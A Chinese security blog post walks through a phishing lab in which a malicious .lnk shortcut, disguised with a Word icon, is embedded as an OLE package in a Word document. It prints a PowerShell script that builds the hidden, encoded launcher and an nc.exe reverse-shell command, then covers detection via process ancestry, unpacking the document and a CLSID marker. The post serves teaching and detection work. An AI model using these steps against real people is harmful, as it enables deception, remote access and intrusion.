网络钓鱼:OLE+LNK

admin 2024年9月13日16:27:24评论10 views字数 1368阅读4分33秒阅读模式
本实验探讨了一种流行的网络钓鱼技术,攻击者将.lnk文件嵌入到 Office 文档中,并使用 Ms Word office图标伪装它们,以欺骗受害者单击并运行它们。

武器化

创建 .LNK 文件,一旦执行将触发有效负载

$command = 'Start-Process c:shell.cmd'$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)$encodedCommand = [Convert]::ToBase64String($bytes)$obj = New-object -comobject wscript.shell$link = $obj.createshortcut("c:experimentsole+lnkInvoice-FinTech-0900541.lnk")$link.windowstyle = "7"$link.targetpath = "C:WindowsSystem32WindowsPowerShellv1.0powershell.exe"$link.iconlocation = "C:Program FilesWindows NTAccessorieswordpad.exe"$link.arguments = "-Nop -sta -noni -w hidden -encodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAOgBcAHMAaABlAGwAbAAuAGMAbQBkAA=="$link.save()

Powershell 有效负载将触发基本的 NC 反向 shell:

C:toolsnc.exe 10.0.0.5 443 -e cmd.exe

执行上述 powershell 脚本后,将创建一个快捷方式:.LNK

网络钓鱼:OLE+LNK

让我们创建一个 Word 文档,该文档将包含上一步中创建的恶意快捷方式:

网络钓鱼:OLE+LNK

让我们通过选择一个并将其图标源更改为 Microsoft Word 可执行文件来将一个新对象插入到文档中:Package

网络钓鱼:OLE+LNK

网络钓鱼:OLE+LNK

将包指向包含有效负载的.lnk文件:

网络钓鱼:OLE+LNK

最终效果

网络钓鱼:OLE+LNK

执行

执行嵌入文档的受害者。显示一个弹出窗口以确认执行

网络钓鱼:OLE+LNK

一旦受害者确认他们想要打开文件 - 反向shell就会返回给攻击者:

网络钓鱼:OLE+LNK

监测方法

触发有效负载后,进程祖先看起来符合预期 - powershell 由 winword 生成,cmd 由 powershell 生成..:

网络钓鱼:OLE+LNK

不久之后,powershell 被终止,cmd.exe成为一个孤立的进程:

网络钓鱼:OLE+LNK

与 T1137:网络钓鱼 - Office 宏中一样,您可以使用 Windows 工作站上的基本工具快速会审可疑的 Office 文档。首先,将文件重命名为 .zip 扩展名并解压缩。然后,您可以导航到并查找包含恶意的文件:wordembeddingsoleObject.bin.lnk

网络钓鱼:OLE+LNK

然后,您可以对文件进行简单或十六进制转储,您应该立即看到一些应该引起您注意的迹象:strings

hexdump.exe -C .oleObject1.bin

网络钓鱼:OLE+LNK

作为分析师,应该在.bin文件中查找,这意味着.doc包含嵌入的.lnk文件。在我们的例子中,可以在这里观察到这一点:CLSID 00021401-0000-0000-c000-000000000046

网络钓鱼:OLE+LNK

 

原文始发于微信公众号(白帽子社区团队):网络钓鱼:OLE+LNK(文末转发福利)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月13日16:27:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网络钓鱼:OLE+LNKhttps://cn-sec.com/archives/3158184.html

发表评论

匿名网友 填写信息